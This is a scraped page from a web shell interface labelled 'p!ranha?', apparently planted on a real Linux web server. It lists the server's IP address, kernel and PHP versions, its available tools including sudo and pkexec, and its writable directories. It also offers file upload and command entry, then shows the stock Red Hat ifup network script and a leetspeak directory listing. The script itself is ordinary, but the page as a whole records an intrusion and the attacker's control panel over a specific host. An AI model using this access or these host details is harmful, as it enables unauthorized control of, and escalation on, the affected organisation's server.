p!ranha?
Server IP : 103.169.32.36  /  Your IP : 216.73.217.108
Web Server : Apache
System : Linux web.dpmptsp 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /etc/sysconfig/network-scripts/

Upload File :
Curr3nt_D!r [ Writeable ] D0cum3nt_r0Ot [ Writeable ]

 
Command :
Current File : /etc/sysconfig/network-scripts/ifup
#!/bin/bash
# Network Interface Configuration System
# Copyright (c) 1996-2009 Red Hat, Inc. all rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License, version 2,
# as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.

unset WINDOW # defined by screen, conflicts with our usage

. /etc/init.d/functions

cd /etc/sysconfig/network-scripts
. ./network-functions

[ -f ../network ] && . ../network

CONFIG=${1}

[ -z "${CONFIG}" ] && {
    echo $"Usage: ifup <configuration>" >&2
    exit 1
}

need_config "${CONFIG}"

[ -f "${CONFIG}" ] || {
    echo $"$0: configuration for ${1} not found." >&2
    echo $"Usage: ifup <configuration>" >&2
    exit 1
}

if [ ${UID} != 0 ]; then
    if [ -x /usr/sbin/usernetctl ]; then
        source_config
        if /usr/sbin/usernetctl ${CONFIG} report ; then
            exec /usr/sbin/usernetctl ${CONFIG} up
        fi
    fi
    echo $"Users cannot control this device." >&2
    exit 1
fi

source_config

if [ "foo$2" = "fooboot" ] && [ "${ONBOOT}" = "no" -o "${ONBOOT}" = "NO" ]
then
    exit 0
fi
if [ -n "$IN_HOTPLUG" ] && [ "${HOTPLUG}" = "no" -o "${HOTPLUG}" = "NO" ]
then
    exit 0
fi
if [ -n "$IN_HOTPLUG" -a "${TYPE}" = "Bridge" ]; 
then
    exit 0
fi

if [ "$_use_nm" = "true" -a -n "$UUID" -a "$REALDEVICE" != "lo" ]; then
    if [ "foo$2" = "fooboot" ] && [ "${TYPE}" = "Wireless" ]; then
        exit 0
    fi
    [ -n "${DEVICE}" ] && is_nm_handling ${DEVICE} && exit 0
    nmcli con up uuid "$UUID"
    exit $?
fi

# Ethernet 802.1Q VLAN support
if [ "${VLAN}" = "yes" ] && [ "$ISALIAS" = "no" ] && [ -n "$DEVICE" ]; then
    if [ -n "${VID}" ]; then
        if test -z "$PHYSDEV"; then
            net_log $"PHYSDEV should be set for device ${DEVICE}"
            exit 1
        fi
    else
        VID=""
        MATCH='^.+\.[0-9]{1,4}$'
        if [[ "${DEVICE}" =~ $MATCH ]]; then
            VID=$(echo "${DEVICE}" | LC_ALL=C sed 's/^.*\.\([0-9]\+\)/\1/')
            PHYSDEV=${DEVICE%.*}
        fi
        MATCH='^vlan[0-9]{1,4}?'
        if [[ "${DEVICE}" =~ $MATCH ]]; then
            VID=$(echo "${DEVICE}" | LC_ALL=C sed 's/^vlan0*//')
            # PHYSDEV should be set in ifcfg-vlan* file
            if test -z "$PHYSDEV"; then
                net_log $"PHYSDEV should be set for device ${DEVICE}"
                exit 1
            fi
        fi
    fi
    if [ -n "$VID" ]; then
        if [ ! -d /proc/net/vlan ]; then
            if ! modprobe 8021q >/dev/null 2>&1 ; then
                net_log $"No 802.1Q VLAN support available in kernel for device ${DEVICE}"
                exit 1
            fi
        fi

        is_available_wait ${PHYSDEV} ${DEVTIMEOUT} || {
            if [ "$?" = "1" ] ; then
                net_log $"$alias device ${DEVICE} does not seem to be present, delaying initialization."
                exit 1
            else
                exit 0
            fi
        }

        # Link on Physical device needs to be up but no ip required
        check_device_down ${PHYSDEV} && { ip -o link set dev ${PHYSDEV} up; }

        if [ ! -f /proc/net/vlan/${DEVICE} ]; then
            if [ "${REORDER_HDR}" = "no" -o "${REORDER_HDR}" = "0" ]; then
                FLAG_REORDER_HDR="reorder_hdr off"
            fi

            if [ "${GVRP}" = "yes" -o "${GVRP}" = "1" ]; then
                FLAG_GVRP="gvrp on"
            fi

            ip link add dev ${DEVICE} link ${PHYSDEV} type vlan id ${VID} ${FLAG_REORDER_HDR} ${FLAG_GVRP} || {
                (/usr/bin/logger -p daemon.info -t ifup \
                     $"ERROR: could not add vlan ${VID} as ${DEVICE} on dev ${PHYSDEV}" &) &
                net_log $"ERROR: could not add vlan ${VID} as ${DEVICE} on dev ${PHYSDEV}"
                exit 1
            }

            [ -n "${VLAN_EGRESS_PRIORITY_MAP}" ] && ip link set ${DEVICE} type vlan egress ${VLAN_EGRESS_PRIORITY_MAP}
        fi
    fi

    /usr/lib/systemd/systemd-sysctl \
        --prefix "/proc/sys/net/ipv4/conf/${DEVICE}" \
        --prefix "/proc/sys/net/ipv6/conf/${DEVICE}"
fi

if [ "${BOOTPROTO}" = "bootp" -o "${BOOTPROTO}" = "dhcp" ]; then
    DYNCONFIG=true
fi

if [ -x /sbin/ifup-pre-local ]; then
    /sbin/ifup-pre-local ${CONFIG} $2
fi

OTHERSCRIPT="/etc/sysconfig/network-scripts/ifup-${DEVICETYPE}"

if [ ! -x ${OTHERSCRIPT} ]; then
    OTHERSCRIPT="/etc/sysconfig/network-scripts/ifup-${TYPE}"
fi

if [ ! -x ${OTHERSCRIPT} ]; then
    OTHERSCRIPT="/etc/sysconfig/network-scripts/ifup-eth"
fi

exec ${OTHERSCRIPT} ${CONFIG} $2
N4m3
5!z3
L45t M0d!f!3d
0wn3r / Gr0up
P3Rm!55!0n5
0pt!0n5
..
--
September 29 2025 07:00:44
0 / 0
0755
ifcfg-eth0
0.403 KB
December 20 2023 04:38:53
0 / 0
0644
ifcfg-lo
0.248 KB
May 22 2020 10:44:33
0 / 0
0644
ifdown
1.612 KB
May 22 2020 10:44:33
0 / 0
0755
ifdown-Team
1.583 KB
December 09 2018 08:57:18
0 / 0
0755
ifdown-TeamPort
1.52 KB
December 09 2018 08:57:18
0 / 0
0755
ifdown-bnep
0.639 KB
May 22 2020 10:44:33
0 / 0
0755
ifdown-eth
6.379 KB
May 22 2020 10:44:33
0 / 0
0755
ifdown-ippp
0.763 KB
May 22 2020 10:44:33
0 / 0
0755
ifdown-ipv6
4.434 KB
May 22 2020 10:44:33
0 / 0
0755
ifdown-isdn
0.763 KB
May 22 2020 10:44:33
0 / 0
0755
ifdown-post
2.08 KB
May 22 2020 10:44:33
0 / 0
0755
ifdown-ppp
1.043 KB
May 22 2020 10:44:33
0 / 0
0755
ifdown-routes
0.85 KB
May 22 2020 10:44:33
0 / 0
0755
ifdown-sit
1.422 KB
May 22 2020 10:44:33
0 / 0
0755
ifdown-tunnel
1.428 KB
May 22 2020 10:44:33
0 / 0
0755
ifup
4.893 KB
May 22 2020 10:44:33
0 / 0
0755
ifup-Team
1.714 KB
December 09 2018 08:57:18
0 / 0
0755
ifup-TeamPort
1.832 KB
December 09 2018 08:57:18
0 / 0
0755
ifup-aliases
12.124 KB
May 22 2020 10:44:33
0 / 0
0755
ifup-bnep
0.889 KB
May 22 2020 10:44:33
0 / 0
0755
ifup-eth
13.436 KB
May 22 2020 10:44:33
0 / 0
0755
ifup-ippp
11.792 KB
May 22 2020 10:44:33
0 / 0
0755
ifup-ipv6
11.614 KB
May 22 2020 10:44:33
0 / 0
0755
ifup-isdn
11.792 KB
May 22 2020 10:44:33
0 / 0
0755
ifup-plip
0.635 KB
May 22 2020 10:44:33
0 / 0
0755
ifup-plusb
1.039 KB
May 22 2020 10:44:33
0 / 0
0755
ifup-post
4.88 KB
May 22 2020 10:44:33
0 / 0
0755
ifup-ppp
4.057 KB
May 22 2020 10:44:33
0 / 0
0755
ifup-routes
1.954 KB
May 22 2020 10:44:33
0 / 0
0755
ifup-sit
3.226 KB
May 22 2020 10:44:33
0 / 0
0755
ifup-tunnel
2.715 KB
May 22 2020 10:44:33
0 / 0
0755
ifup-wireless
1.793 KB
May 22 2020 10:44:33
0 / 0
0755
init.ipv6-global
5.292 KB
May 22 2020 10:44:33
0 / 0
0755
network-functions
20.193 KB
May 22 2020 10:44:33
0 / 0
0644
network-functions-ipv6
30.262 KB
May 22 2020 10:44:33
0 / 0
0644